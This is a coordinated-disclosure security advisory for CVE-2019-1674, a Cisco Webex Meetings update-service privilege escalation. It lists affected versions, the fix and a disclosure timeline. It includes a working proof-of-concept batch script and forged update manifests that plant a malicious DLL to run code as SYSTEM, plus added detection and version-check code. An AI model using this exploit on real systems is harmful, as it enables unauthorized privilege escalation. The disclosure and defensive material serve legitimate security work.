Cisco Webex Meetings Desktop App Local Privilege Escalation Vulnerability (CVE-2019-1674)

Affected versions of Webex Meetings Desktop App:
33.6.4.15, 33.6.5.2, 33.7.0.694, 33.7.1.15, 33.7.2.24, 33.7.3.7, 33.8.0.779, 33.8.1.13, and 33.8.2.7

SecureAuth - SecureAuth Labs Advisory
http://www.secureauth.com/

Cisco Webex Meetings Desktop App Local Privilege Escalation Vulnerability, Version 2

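1. *Advisory Information*

Title: Cisco Webex Meetings Desktop App Local Privilege Escalation Vulnerability
Advisory ID: CORE-2018-0012
Advisory URL:
http://www.secureauth.com/labs/advisories/cisco-webex-meetings-elevation-privilege-vulnerability-version-2
Date published: 2019-02-27
Date of last update: 2019-02-27
Vendors contacted: Cisco
Release mode: Coordinated release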

2. *Vulnerability Information*

Class: OS command injection [CWE-78]
Impact: Code execution
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-2019-1674

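3. *Vulnerability Description*

Cisco's Webex Meetings website states that [1]:

Cisco Webex Meetings: Simply the Best Video Conferencing and Online
Meetings. With Cisco Webex Meetings, joining is a breeze, audio and video
are clear, and screen sharing is easier than ever. We help you forget
about the technology, to focus on what matters.

A vulnerability in the update service of Cisco Webex Meetings Desktop App
for Windows could allow a local attacker to elevate privileges.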

4. *Vulnerable Packages*

Older versions may also be affected.

Cisco Webex Meetings Desktop App v33.6.4.15
Cisco Webex Meetings Desktop App v33.6.5.2
Cisco Webex Meetings Desktop App v33.7.0.694
Cisco Webex Meetings Desktop App v33.7.1.15
Cisco Webex Meetings Desktop App v33.7.2.24
Cisco Webex Meetings Desktop App v33.7.3.7
Cisco Webex Meetings Desktop App v33.8.0.779
Cisco Webex Meetings Desktop App v33.8.1.13
Cisco Webex Meetings Desktop App v33.8.2.7

5. *Vendor Information, Solutions and Workarounds*

Cisco informed that the vulnerability is fixed in Cisco Webex Meetings Desktop App releases 33.6.6 and 33.9.1.

In addition, Cisco published the following advisory:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190227-wmda-cmdinj

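7. *Technical Description / Proof of Concept Code*

7.1. *Privilege Escalation*

[CVE-2019-1674]

The update service of Cisco Webex Meetings Desktop App for Windows does
not properly validate version numbers of new files. An unprivileged
local attacker could exploit this vulnerability by invoking the update
service command with a crafted argument and folder. This allows the
attacker to run arbitrary commands with SYSTEM user privileges.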

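The vulnerability can be exploited by copying the atgpcdec.dll binary to
a local attacker-controlled folder and renaming it to atgpcdec.7z.
Then, a previous version of the ptUpdate.exe file must be compressed as
7z and copied to the controlled folder. Also, a malicious DLL must be
placed in the same folder, named vcruntime140.dll and compressed as
vcruntime140.7z. Finally, a ptUpdate.xml file must be provided in the
controlled folder for the update binary (ptUpdate.exe) to treat our
files as a normal update. To gain privileges, the attacker must start
the service with the command line:
sc start webexservice WebexService 1 989898 "attacker-controlled path"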
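
Detection sketch for the service invocation described above, added here as an example and not part of the original advisory. The event tuples are constructed sample data, and the trusted-folder list and the rule that any caller-supplied service argument deserves review are assumptions.

```python
import re

# Constructed process-creation records (user, command line); not real telemetry.
SAMPLE_EVENTS = [
    ("CORP\\alice", r'sc  start webexservice WebexService 1 989898 C:\Users\alice\poc'),
    ("CORP\\bob", r'"C:\Windows\System32\sc.exe" START WebExService WebexService 1 989898 "C:\Users\Public\stage dir"'),
    ("CORP\\carol", r'sc.exe query webexservice'),
    ("NT AUTHORITY\\SYSTEM", r'sc start webexservice'),
]

# sc[.exe], optionally quoted or with a full path, then "start webexservice" and any trailing arguments.
SC_START = re.compile(
    r'^\s*"?(?:[^"]*\\)?sc(?:\.exe)?"?\s+start\s+webexservice\b(?P<args>.*)$',
    re.IGNORECASE,
)
# Assumption: folders that only administrators can write to.
TRUSTED_ROOTS = ("c:\\program files\\", "c:\\program files (x86)\\")


def split_args(text):
    """Split a Windows-style argument string, keeping quoted paths whole."""
    return [q or u for q, u in re.findall(r'"([^"]*)"|(\S+)', text)]


def check_event(user, cmdline):
    """Return a finding if the command starts the service with arguments."""
    m = SC_START.match(cmdline)
    if not m:
        return None
    args = split_args(m.group("args"))
    if not args:
        return None  # plain service start, no caller-supplied parameters
    folder = args[-1]  # in the advisory's command the folder is the last argument
    normalized = folder.lower().rstrip("\\") + "\\"
    return {
        "user": user,
        "args": args,
        "folder": folder,
        "untrusted_folder": not normalized.startswith(TRUSTED_ROOTS),
    }


def scan(events):
    """Run check_event over (user, command line) pairs and keep the findings."""
    return [f for f in (check_event(u, c) for u, c in events) if f]
```
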

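Proof of Concept:

The following proof of concept performs a 2-step attack, since starting
from version 33.8.x the application enforces signature checks for all
downloaded binaries. This 2-step attack works against all the vulnerable
packages mentioned above. Note that you need previous versions of the
ptUpdate.exe executable. Those versions are 3307.1.1811.1500 for the
first step and 3306.4.1811.1600 for the last step. To exploit versions
prior to 33.8.x, only one step is required (the last step in this PoC).

Batch file: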

@echo off
REM Contents of PoC.bat
REM
REM This batch file will exploit CVE-2019-1674
REM
REM First, it will copy the atgpcdec.dll file from the installation
REM folder to the current folder as atgpcdec.7z. Then, it will backup
REM ptUpdate.exe and vcruntime140.dll files from the installation folder
REM in the current folder, adding .bak to their names. Keep in mind that
REM those files will be replaced (especially, vcruntime140.dll) and if
REM not restored, will render the application useless.
REM
REM The executable ptUpdate.exe version 3307.1.1811.1500 must be
REM compressed as ptUpdate0.7z and present in the current folder.
REM The executable ptUpdate.exe version 3306.4.1811.1600 must be
REM compressed as ptUpdate1.7z and present in the current folder.
REM Both can be generated using 7zip GUI and compressing as 7z, with
REM normal compression level and LZMA compression method.
REM Another way is to compress both files using the command line app:
REM
REM 7z.exe a ptUpdate0.7z ptUpdate.exe -m0=BCJ -m1=LZMA:d=21
REM
REM ptUpdate0.xml file will be used in the first stage of the attack. It
REM will be renamed to ptUpdate.xml. Make sure to check and adjust (if
REM necessary) the "Size" and "PackagedSize" values of the xml, to the
REM ptUpdate0.7z ones. ptUpdate0.7z will be renamed to ptUpdate.7z. Then
REM the update service will be started.
REM
REM The batch will wait until the process (ptUpdate.exe) finishes
REM
REM After the first stage is completed, it will rename ptUpdate.7z
REM back to ptUpdate0.7z, and ptUpdate.xml to ptUpdate0.xml.
REM
REM Now, ptUpdate1.xml file will be used in the second stage of the
REM attack. It will be renamed to ptUpdate.xml. Also, ptUpdate1.7z will
REM be renamed to ptUpdate.7z. Remember to check and adjust (if
REM necessary) the "Size" and "PackagedSize" values of the xml, to the
REM ptUpdate1.7z ones. Our "malicious" DLL will be generated using
REM certutil.exe and named vcruntime140.7z. It's a simple dll that will
REM execute notepad.exe on load and that has the same exported functions
REM as the original. The update service will be started again.
REM
REM The batch will wait until the process (ptUpdate.exe) finishes
REM
REM Once finished, it will print that the attack is done and wait for a
REM key press. You should see a notepad.exe (2, in fact) with SYSTEM
REM user privileges running.
REM
REM After a key is pressed, the batch will finish removing atgpcdec.7z
REM and vcruntime140.7z. Also it will rename ptUpdate.7z back to
REM ptUpdate1.7z, and ptUpdate.xml to ptUpdate1.xml.


:CheckOS
IF EXIST "%PROGRAMFILES(X86)%" (GOTO 64BIT) ELSE (GOTO 32BIT)

:64BIT
copy "%PROGRAMFILES(X86)%\Webex\Webex\Applications\atgpcdec.dll" atgpcdec.7z
copy "%PROGRAMFILES(X86)%\Webex\Webex\Applications\ptUpdate.exe" ptUpdate.exe.bak
copy "%PROGRAMFILES(X86)%\Webex\Webex\Applications\vcruntime140.dll" vcruntime140.dll.bak
GOTO END

:32BIT
copy "%PROGRAMFILES%\Webex\Webex\Applications\atgpcdec.dll" atgpcdec.7z
copy "%PROGRAMFILES%\Webex\Webex\Applications\ptUpdate.exe" ptUpdate.exe.bak
copy "%PROGRAMFILES%\Webex\Webex\Applications\vcruntime140.dll" vcruntime140.dll.bak
GOTO END

:END

ren ptUpdate0.xml ptUpdate.xml
ren ptUpdate0.7z ptUpdate.7z
SET mypath=%~dp0
sc start webexservice WebexService 1 989898 %mypath:~0,-1%

ECHO Waiting 3 seconds until ptUpdate.exe starts
Timeout /T 3 /Nobreak

:LOOP1
tasklist | find /i "ptUpdate" >nul 2>&1
IF ERRORLEVEL 1 (
  GOTO CONTINUE1
) ELSE (
  ECHO ptUpdate.exe is still running
  Timeout /T 1 /Nobreak
  GOTO LOOP1
)

:CONTINUE1

ren ptUpdate.xml ptUpdate0.xml
ren ptUpdate.7z ptUpdate0.7z
ren ptUpdate1.xml ptUpdate.xml
ren ptUpdate1.7z ptUpdate.7z

REM [base64-encoded vcruntime140.7z payload, echoed into dll.txt, omitted]

certutil -decode dll.txt vcruntime140.7z

del dll.txt

SET mypath=%~dp0
sc start webexservice WebexService 1 989898 %mypath:~0,-1%

ECHO Waiting 3 seconds until ptUpdate.exe starts
Timeout /T 3 /Nobreak

:LOOP2
tasklist | find /i "ptUpdate" >nul 2>&1
IF ERRORLEVEL 1 (
  GOTO CONTINUE2
) ELSE (
  ECHO ptUpdate.exe is still running
  Timeout /T 1 /Nobreak
  GOTO LOOP2
)

:CONTINUE2

ECHO Attack done!
pause

ren ptUpdate.xml ptUpdate1.xml
ren ptUpdate.7z ptUpdate1.7z
del atgpcdec.7z
del vcruntime140.7z

ptUpdate0.xml file:

/-----
<?xml version="1.0"?>
<serv:message xmlns:serv="http://www.webex.com/schemas/2002/06/service"
xmlns:com="http://www.webex.com/schemas/2002/06/common"
xmlns:use="http://www.webex.com/schemas/2002/06/service/user">
    <serv:header></serv:header>
    <serv:body>
        <serv:bodyContent xsi:type="use:getUpdateResponse"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
            <UpdateVersionNumber>33.8.3</UpdateVersionNumber>
            <BuildNumber>33.8.3-24</BuildNumber>
            <ExternalVersionNumber>33.8.3.24</ExternalVersionNumber>
            <GPCINI>self/gpc.php</GPCINI>
            <ReleaseDate>February 2017</ReleaseDate>
            <Description>WebEx Productivity Tools 33.8.3</Description>
            <MsiLocation>msi/ptools.msi</MsiLocation>
            <UpdateFormat>binary</UpdateFormat>
            <ReleaseTrain>T32</ReleaseTrain>
            <Location>$dummy/upgradeserver/client/ptool/33.8.3</Location>
            <ControlOption>0</ControlOption>
            <WBSVERSION>33</WBSVERSION>
            <Server>myCompany.webex.com</Server>
            <UserName>MCKSysAR@myCompany.com</UserName>
            <DownloadSize>22496333</DownloadSize>
            <VersionURL/>
            <FileInfo>
                <SectionName>Installation</SectionName>
                <PackedName>ptupdate.7z</PackedName>
                <PackedNameL10N>ptupdate.7z</PackedNameL10N>
                <OrigianlName>ptupdate.exe</OrigianlName>
                <Version>3307,1,1811,1500</Version>
                <Size>1985592</Size>
                <PackagedSize>610752</PackagedSize>
                <CheckMethod>1</CheckMethod>
                <CouldIgnore>1</CouldIgnore>
                <NeedDownLoad>1</NeedDownLoad>
            </FileInfo>
            <Tools>
                <UseEmailType/>
                <Outlook>0</Outlook>
                <Notes>0</Notes>
                <UseWebExWithOffice>1</UseWebExWithOffice>
                <Excel>0</Excel>
                <PowerPoint>0</PowerPoint>
                <Word>0</Word>
                <IEShortCut>1</IEShortCut>
                <IERightMenu>0</IERightMenu>
                <UseWebExWithIM>1</UseWebExWithIM>
                <AOL>0</AOL>
                <Sametime>0</Sametime>
                <WindowsMessenger>0</WindowsMessenger>
                <Yahoo>0</Yahoo>
                <Skype>0</Skype>
                <GoogleTalk>0</GoogleTalk>
                <Firefox/>
                <IPPhone>1</IPPhone>
            </Tools>
        </serv:bodyContent>
    </serv:body>
</serv:message>
-----/

ptUpdate1.xml file:

/-----
<?xml version="1.0"?>
<serv:message xmlns:serv="http://www.webex.com/schemas/2002/06/service"
xmlns:com="http://www.webex.com/schemas/2002/06/common"
xmlns:use="http://www.webex.com/schemas/2002/06/service/user">
    <serv:header>                                                       
    </serv:header>
    <serv:body>
        <serv:bodyContent xsi:type="use:getUpdateResponse"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
            <UpdateVersionNumber>33.8.4</UpdateVersionNumber>
            <BuildNumber>33.8.4-24</BuildNumber>
            <ExternalVersionNumber>33.8.4.24</ExternalVersionNumber>
            <GPCINI>self/gpc.php</GPCINI>
            <ReleaseDate>February 2017</ReleaseDate>
            <Description>WebEx Productivity Tools 33.8.4</Description>
            <MsiLocation>msi/ptools.msi</MsiLocation>
            <UpdateFormat>binary</UpdateFormat>
            <ReleaseTrain>T32</ReleaseTrain>
            <Location>$dummy/upgradeserver/client/ptool/33.8.4</Location>
            <ControlOption>0</ControlOption>
            <WBSVERSION>33</WBSVERSION>
            <Server>myCompany.webex.com</Server>
            <UserName>MCKSysAR@myCompany.com</UserName>
            <DownloadSize>22496333</DownloadSize>
            <VersionURL/>
            <FileInfo>
                <SectionName>Common</SectionName>
                <PackedName>vcruntime140.7z</PackedName>
                <PackedNameL10N>vcruntime140.7z</PackedNameL10N>
                <OrigianlName>vcruntime140.dll</OrigianlName>
                <Version>14,14,26405,0</Version>
                <Size>6144</Size>
                <PackagedSize>1761</PackagedSize>
                <CheckMethod>1</CheckMethod>
                <CouldIgnore>1</CouldIgnore>
                <NeedDownLoad>1</NeedDownLoad>
            </FileInfo>
            <FileInfo>
                <SectionName>Installation</SectionName>
                <PackedName>ptupdate.7z</PackedName>
                <PackedNameL10N>ptupdate.7z</PackedNameL10N>
                <OrigianlName>ptupdate.exe</OrigianlName>
                <Version>3306,4,1811,1600</Version>
                <Size>1992760</Size>
                <PackagedSize>611786</PackagedSize>
                <CheckMethod>1</CheckMethod>
                <CouldIgnore>1</CouldIgnore>
                <NeedDownLoad>1</NeedDownLoad>
            </FileInfo>
            <Tools>
                <UseEmailType/>
                <Outlook>0</Outlook>
                <Notes>0</Notes>
                <UseWebExWithOffice>1</UseWebExWithOffice>
                <Excel>0</Excel>
                <PowerPoint>0</PowerPoint>
                <Word>0</Word>
                <IEShortCut>1</IEShortCut>
                <IERightMenu>0</IERightMenu>
                <UseWebExWithIM>1</UseWebExWithIM>
                <AOL>0</AOL>
                <Sametime>0</Sametime>
                <WindowsMessenger>0</WindowsMessenger>
                <Yahoo>0</Yahoo>
                <Skype>0</Skype>
                <GoogleTalk>0</GoogleTalk>
                <Firefox/>
                <IPPhone>1</IPPhone>
            </Tools>
        </serv:bodyContent>
    </serv:body>
</serv:message>
-----/
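
A version gate over the manifest format shown above, added here as an example; it is not Cisco's fix and not code from the advisory. The manifest is a constructed, trimmed copy of the two `<FileInfo>` entries in ptUpdate1.xml, and the installed versions are hypothetical values chosen for the example.

```python
import xml.etree.ElementTree as ET

# Constructed manifest: the two <FileInfo> entries of ptUpdate1.xml, trimmed.
MANIFEST = """<serv:message xmlns:serv="http://www.webex.com/schemas/2002/06/service">
  <serv:body><serv:bodyContent>
    <FileInfo>
      <OrigianlName>vcruntime140.dll</OrigianlName>
      <Version>14,14,26405,0</Version>
    </FileInfo>
    <FileInfo>
      <OrigianlName>ptupdate.exe</OrigianlName>
      <Version>3306,4,1811,1600</Version>
    </FileInfo>
  </serv:bodyContent></serv:body>
</serv:message>"""

# Hypothetical installed file versions, constructed for this example.
INSTALLED = {
    "ptupdate.exe": (3308, 2, 1811, 0),
    "vcruntime140.dll": (14, 14, 26405, 0),
}


def parse_version(text):
    """'3306,4,1811,1600' -> (3306, 4, 1811, 1600); raises on malformed input."""
    parts = tuple(int(p) for p in text.strip().split(","))
    if len(parts) != 4 or any(p < 0 for p in parts):
        raise ValueError(f"bad version: {text!r}")
    return parts


def review_manifest(xml_text, installed):
    """Return (file name, verdict) pairs; only known, strictly newer files pass."""
    verdicts = []
    for info in ET.fromstring(xml_text).iter("FileInfo"):
        name = info.findtext("OrigianlName", "").lower()
        offered = parse_version(info.findtext("Version", ""))
        current = installed.get(name)
        if current is None:
            verdict = "reject: unknown file"
        elif offered < current:  # numeric tuple comparison, not string comparison
            verdict = "reject: downgrade"
        elif offered == current:
            verdict = "reject: same version, nothing to update"
        else:
            verdict = "accept"
        verdicts.append((name, verdict))
    return verdicts
```

A version gate is one layer only; it does not replace signature checks on the unpacked files or a restriction on which folders the service will read updates from.
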
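
8. *Report Timeline*

2018-12-04: SecureAuth sent an initial notification to Cisco PSIRT, including a draft advisory.
2018-12-05: Cisco confirmed receipt of the advisory and informed that they would open a case.
2018-12-07: Cisco replied that they were able to reproduce the vulnerability and were working on a plan for the fix.
2018-12-07: SecureAuth thanked Cisco for the update.
2018-12-10: Cisco notified SecureAuth that the fix would be available before the end of February.
2018-12-10: SecureAuth thanked Cisco for the update.
2019-01-15: SecureAuth asked Cisco for an update.
2019-01-22: SecureAuth asked Cisco for an update again.
2019-01-22: Cisco answered that they were still targeting the end of February for the release of the fix.
2019-02-11: Cisco confirmed February 27 as the disclosure date.
2019-02-27: Advisory CORE-2018-0012 published.

9. *References*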

[1] https://www.webex.com/products/video-conferencing.html